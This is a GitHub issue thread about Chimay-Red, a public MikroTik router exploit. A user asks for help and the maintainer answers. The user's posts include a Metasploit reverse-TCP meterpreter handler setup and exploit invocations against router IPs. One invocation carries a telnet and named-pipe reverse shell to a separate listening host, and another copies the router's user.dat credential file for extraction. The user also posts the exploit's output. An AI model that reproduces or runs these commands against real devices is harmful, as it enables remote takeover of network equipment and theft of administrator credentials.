BigNerd95 / Chimay-Red

Working POC of Mikrotik exploit from Vault 7 CIA Leaks
649 stars, 216 forks

shellcommand #28

Open halekan opened 6 years ago

halekan commented 6 years ago

What shellcommand? How do I build it on Kali Linux to make it work fine?

/StackClash_mips.py 192.168.1.233 80 binary 192.168.1.89 6785 "nova/bin/info '/system reboot'"

Usage: ./StackClash_mips.py IP PORT binary shellcommand

How to get a reverse shell?

  1. First, prepare the metasploit multi handler on your computer:

    use exploit/multi/handler
    set payload linux/mipsbe/meterpreter/reverse_tcp
    set LHOST YOUR IP
    set LPORT YOUR LPORT
    run

Where is the payload to send to MikroTik, and how do I build it with msfvenom? We have only the binary???????

Can you explain?

BigNerd95 commented 6 years ago

What is this? /StackClash_mips.py 192.168.1.233 80 binary 192.168.1.89 6785 "nova/bin/info '/system reboot'"

Pseudo random command?

Please read the readme.md before opening issues https://github.com/BigNerd95/Chimay-Red/blob/master/README.md#reverse-shell

halekan commented 6 years ago

good

Read it in full. Test on RB750GL / MIPSBE / v6.37.1:

$ nc -l -p 1234

root@test:~/Chimay# ./StackClash_mips.py 192.168.230.113 80 www_binary "/bin/mknod /ram/f p; /bin/telnet 192.168.233.190 1234 < /ram/f | /bin/bash > /ram/f 2>&1"

Crash...
Connected
Sent
Sent
Opening 2 sockets
Connected
Connected
Stack clash...
Sent
Sent
Sent
Sending payload
Sent
Starting exploit
Done!

root@test:~/Chimay# ./StackClash_mips.py 192.168.233.190 80 www_binary "cp /rw/store/user.dat /ram/winbox.idx"

Crash...
Connected
Sent
Sent
Opening 2 sockets
Connected
Connected
Stack clash...
Sent
Sent
Sent
Sending payload
Sent
Starting exploit
Done!

Extract users: nothing happens.

root@test:~/Chimay# curl -s http://192.168.233.190/winbox/index | ./tools/extract_user.py -

root@test:~/Chimay#

It is blank: no result, no user, no password.

BigNerd95 commented 6 years ago

Does reverse shell work? When you run "extract user" do you close reverse shell before running the exploit?

halekan commented 6 years ago

$ nc -l -p 1234

No.

BigNerd95 commented 6 years ago

So you have to root your board and debug it. Sorry, but I can't test all versions for anyone. If you are able to fix it then send a PR.

halekan commented 6 years ago

How do I root it? Give me the steps one by one.

BigNerd95 commented 6 years ago

Also a coffee?

Some links:

https://github.com/0ki/mikrotik-tools/tree/master/exploit-backup

https://www.dropbox.com/s/3fey2nmmu993xz1/Rooting%20Mikro%20Tik%20routers.pdf?dl=0

Then read my PDF to install gdb-server.

BigNerd95 commented 6 years ago

Nope